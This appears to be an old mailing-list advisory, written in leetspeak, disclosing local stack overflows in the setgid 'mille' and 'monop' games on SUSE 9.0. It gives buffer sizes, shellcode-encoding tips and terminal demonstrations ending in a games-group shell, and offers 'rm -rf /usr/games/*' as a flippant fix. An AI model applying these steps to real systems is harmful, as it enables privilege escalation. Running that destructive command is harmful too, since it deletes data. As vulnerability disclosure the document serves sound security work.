----- S3CTI0N 0x01 -----
-Bug : Suse 9.0 /usr/games/mille l0c4l l4m3 st4ck 0v3rfl0w.(Wh3n s4vin9 th3 g4m3).
Pr0gr4m suid3d t0 games wi7h d3f4ul7.
-3xpl0i747i0n : 0x01-) m4nu4l-) 112 byt3s fil3n4m3 is 3n0ugh for m4nu4lly
3xpl0i747i0n.
us3 y0ur ASCII r3t 4ddr3ss for fil3n4m3.
0x02-) 3xpl0i7-) Us3 Sh3llc0d3 which unfilt3rs '\x0b' ,'\n',
'\x90','\220' ch4r4ct3rs.
XOR them.'c4us3 mill3 c0nv3rts th4t shi77y ch4r4ct4rs to '~P'.
3sp3ci4lly 0x90 4nd \220.
Us3 y0ur 0wn sh3llc0d3 in th3 4tt4ch3d c0d3.
-D3m0ns7r4ti0n:
[EMAIL PROTECTED]:~/c-hell$ ./env
RET = ���
[EMAIL PROTECTED]:~/c-hell$ /usr/games/mille
--HAND-- --DECK-- | ---- ---- -----
P 89 | Hand Total 0 0
1 75 --DISCARD-- | ----- -----
2 Go | Overall Total 0 0
3 Gasoline | Games 0 0
4 Repairs file: ��� ��� ��� �|
�� ��� ��� ��� ��� ��� ��� ��� ��� ��� �| p: pick q: quit
�� ��� ��� ��� ��� ��� ��� ��� ��� ��� �| u: use # o: order hand
�� ��� ��� ��� ��� ��� ��� ��� ��� ��� �| d: discard # s: save
�� ��� ��� ��� ��� ��� ��� ��� ��� ��� �| w: toggle window r: reprint
�� ��� ��� ��� ��� ��� ��� ��� ��� ��� �|
�� ��� ��� ��� ��� ��� ��� ��� ��� ��� sh-2.05b$ uid=1001(addicted) gid=20(games)
groups=100(users)
----- S3CTI0N 0x02 -----
-Bug : Suse 9.0 /usr/games/monop l0c4l l4m3 st4ck 0v3rfl0w.7hiz iz 4n 0ld but g4m3 iz
s7ill vuln3r4bl3.
0v3rfl0w in 1. pl4y3rn4m3.(4ls0 th3 0th3rs)
Pr0gr4m suid3d games by d3f4ul7
-3xpl0i747i0n : 0x01-) m4nu4l-) 304 byt3s pl4y3rn4m3 is 3n0ugh f0r 3xpl0i747i0n.
Us3 y0ur ASCII r3t 4ddr3ss.
0x02-) 3xpl0i7-) Us3 sh3llc0d3 which is n0t c0nt4ins s0m3 ch4rs like
'\x0b'. XOR them.
3xpl0i7 4tt4ch3d.
-D3m0nstr4ti0n:
[EMAIL PROTECTED]:~/c-hell$ ./env
RET = ���
[EMAIL PROTECTED]:~/c-hell$ /usr/games/monop
How many players? 1
Player 1's name: ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ���
��� ���
��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ���
��� ��� ���
��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ���
��� ��� ���
��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ���
��� ��� ���
��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ���
��� ��� ���
��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ���
��� ��� ���
��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ��� ���
sh-2.05b$ id
uid=1001(addicted) gid=20(games) groups=100(users)
sh-2.05b$
----- S3C7I0N 0x03 -----
C0nclusi0n: Th3r3 4r3 t00 m4ny bin4ri3s s7ill vuln3r4bl3 t0 7his kind 0f bugz.Bu7 I'm
t00 B0R3D.
Quick P4tch : rm -rf /usr/games/*
---------------------------------------------------------------------------------------------------------------------------------------
N4rK07IX
--
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.
Powered by Outblaze
mille.c
Description: Binary data
monopexp.c
Description: Binary data
